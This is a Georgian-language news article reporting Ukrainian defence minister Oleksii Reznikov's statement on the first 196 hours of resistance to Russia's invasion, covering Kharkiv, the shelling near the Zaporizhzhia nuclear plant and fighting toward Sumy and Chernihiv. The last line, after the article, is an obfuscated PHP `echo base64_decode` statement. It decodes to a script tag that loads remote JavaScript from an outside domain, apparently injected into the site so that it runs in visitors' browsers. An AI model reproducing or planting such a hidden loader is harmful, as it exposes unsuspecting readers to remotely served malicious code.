celsiusi
ავერსი შნაიდერი
მსურს ვუთხრა ყველას, უკრაინელებო თქვენ არაჩვეულებრივები ხართ! მტერი შეფიქრიანებული და შეშინებულია. ჩვენ ის ჯერ არ დაგვიმარცხებია, მაგრამ ეს დრო შეუქცევადად გვიახლოვდება, კრემლის ვირთხები უკვე თრთიან, ნაწილი მათგანი აქტიურად ეძებს გასაქცევს. ჩვენ დავიცავთ ჩვენს ქვეყანას და მომავალ თაობებს დავუტოვებთ აყვავებულს, წარმატებულს, უკეთესს ვიდრე ის იყო,- ამის შესახებ უკრაინის თავდაცვის მინისტრმა ალექსეი რეზნიკოვმა განაცხადა.
 
მისი თქმით, უკრაინის დამცველებმა ძირითადი მიმართულებებით მტრის შეჩერება შეძლეს, ახლა მთავარია ამის შენარჩუნება. მინისტრის თქმით, უკვე 196 საათია უკრაინა რუს ოკუპანტებს წინააღმდეგობას უწევს.
 
„ამ საათებსა და დღეებში ვითარების გარდატეხა ხდება. გარდატეხის პერიოდი მოითხოვს განსაკუთრებულ კონცენტრაციას. ჩვენმა დამცველებმა მტერი ძირითად მიმართულებებზე შეაკავეს, ზოგიერთი მიმართულებით კი უკრაინის შეიარაღებულმა ძალებმა წარმატებული კონტრშეტევა განახორციელეს“, -განაცხადა რეზნიკოვმა.
 
მისი ინფორმაციით, რთული ვითარებაა ქვეყნის სამხრეთ ნაწილში, სადაც მტერი უკანასკნელი საათების განმავლობაში ბომბავდა ზაპოროჟიეს ატომურ ელექტროსადგურს, თუმცა „ადამიანების საბრძოლო განწყობა ისეთია, რომ ოკუპანტები განწირულნი არიან მარცხისთვის“.
 
„გადაულახავ სიმაგრედ დგას ხარკოვი. მთელი უკრაინა ტკივილით უყურებს რუსეთის მიერ განხორციელებულ დაბომბვებს. მაგრამ ახლა მთელმა ევროპამ იცის, რომ ხარკოვი არა მხოლოდ ინტელექტუალური და საწარმო ცენტრია, არამედ მამაცი ხალხის ამაყი ქალაქიცაა,“- აღნიშნა მინისტრმა.
 
რეზნიკოვმა ასევე განმარტა, რომ ბრძოლა გრძელდება სუმისა და ჩერნიგოვის მიმართულებით, რომელიც იცავს კიევს ალყისგან.
986
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");